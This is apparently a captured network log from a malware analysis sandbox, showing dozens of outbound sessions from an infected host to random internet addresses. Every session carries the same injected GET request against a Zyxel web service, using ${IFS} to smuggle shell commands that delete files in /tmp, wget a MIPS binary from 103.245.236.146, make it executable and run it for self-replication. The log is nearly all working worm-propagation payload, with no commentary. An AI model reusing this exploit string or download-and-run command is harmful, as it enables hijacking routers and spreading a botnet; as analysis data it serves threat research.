                                                Jan 28, 2024 10:16:40.037626028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8306192.168.2.234495669.142.47.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037666082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8307192.168.2.2356642101.18.117.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037694931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8308192.168.2.233360678.8.194.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037700891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8309192.168.2.2354560169.169.246.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037719965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8310192.168.2.2346908221.30.159.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037748098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8311192.168.2.2341666102.127.160.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037753105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8312192.168.2.2334514133.153.14.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037779093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8313192.168.2.234933831.117.96.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037789106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8314192.168.2.234353834.3.159.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037847042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8315192.168.2.2337738121.7.234.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037878036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8316192.168.2.2350030136.113.149.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037919998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8317192.168.2.234484637.111.147.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037926912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8318192.168.2.2343686195.10.219.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037955046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8319192.168.2.2356686212.41.60.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.037970066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8320192.168.2.2341364141.130.225.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038032055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8321192.168.2.2333728120.67.113.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038058043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8322192.168.2.235842413.140.195.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038075924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8323192.168.2.2350998111.171.68.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038098097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8324192.168.2.235216497.11.103.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038147926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8325192.168.2.234815025.86.163.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038171053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8326192.168.2.2342594149.38.2.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038193941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8327192.168.2.2333302203.136.146.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038206100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8328192.168.2.235883498.238.145.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038237095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8329192.168.2.235551842.104.251.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038266897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8330192.168.2.235094875.247.214.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038306952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8331192.168.2.2343852152.109.42.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038331032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8332192.168.2.236004652.74.98.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038357973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8333192.168.2.2352450157.248.30.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038364887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8334192.168.2.2338410207.36.75.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038404942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8335192.168.2.235881886.251.211.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038443089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8336192.168.2.233877636.138.34.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038484097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8337192.168.2.2336136206.79.132.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038485050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8338192.168.2.234293882.99.255.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038523912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8339192.168.2.2345908137.32.45.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038578987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8340192.168.2.2352632223.115.168.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038587093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8341192.168.2.2339724213.232.173.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038593054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8342192.168.2.2341964189.191.88.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038641930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8343192.168.2.2342276192.46.82.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038654089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8344192.168.2.233693657.154.19.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038687944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8345192.168.2.2350294186.146.130.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038727045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8346192.168.2.234735094.125.246.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038755894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8347192.168.2.234134075.218.221.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038774967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8348192.168.2.2334174156.67.154.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038774967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8349192.168.2.234985047.216.182.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038783073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8350192.168.2.2358092114.242.234.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038804054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8351192.168.2.234169817.15.225.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038817883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8352192.168.2.23461901.192.21.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038821936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8353192.168.2.2354732202.176.119.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038871050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8354192.168.2.2347044183.88.114.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.038913965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8355192.168.2.2338194143.23.161.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041327953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8356192.168.2.234774225.145.167.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041351080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8357192.168.2.2338438222.248.190.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041588068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8358192.168.2.2346550200.59.227.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041608095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8359192.168.2.2347640219.29.170.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041666031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8360192.168.2.2356396180.147.10.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041687965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8361192.168.2.2345172130.16.25.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:40.041701078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8362192.168.2.2335920171.239.45.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047400951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8363192.168.2.2349044183.177.123.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047421932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8364192.168.2.2336816115.148.252.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047447920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8365192.168.2.234962889.178.93.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047461033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8366192.168.2.233333251.183.178.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047477961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8367192.168.2.2352076160.16.118.78443
                                                TimestampBytes transferredDirectionData
